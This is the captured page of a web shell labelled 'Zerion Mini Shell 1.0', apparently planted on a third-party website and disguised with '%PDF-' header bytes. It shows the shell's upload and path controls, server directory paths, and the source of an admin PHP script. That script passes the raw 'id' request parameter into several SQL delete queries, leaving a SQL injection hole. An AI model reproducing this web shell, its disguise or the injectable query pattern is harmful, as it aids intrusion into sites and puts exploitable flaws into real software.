%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/alliance/domains/congress-intercultural.eu/public_html/sauv/
Upload File :
Create Path :
Current File : /home/alliance/domains/congress-intercultural.eu/public_html/sauv/a-suppr_section.php

<?php
include_once("inc/config.php");
include_once("inc/functions.php");
include_once("inc/init.php");
include_once("inc/session.php");

verif_co_admin();

$db = new BaseOps;

$db->delete("section", "id = ".$_GET['id']);
$db->delete("section_lang", "section = ".$_GET['id']." AND lang = 1");
$db->delete("section_lang", "section = ".$_GET['id']." AND lang = 2");
$db->delete("section_edition", "section = ".$_GET['id']);
$db->delete("page", "section = ".$_GET['id']);

$this_edition=$edition->getCurrentEdition("ins",1);

header("Location:liste_section.php?edition=".$this_edition['id']);

?>

Zerion Mini Shell 1.0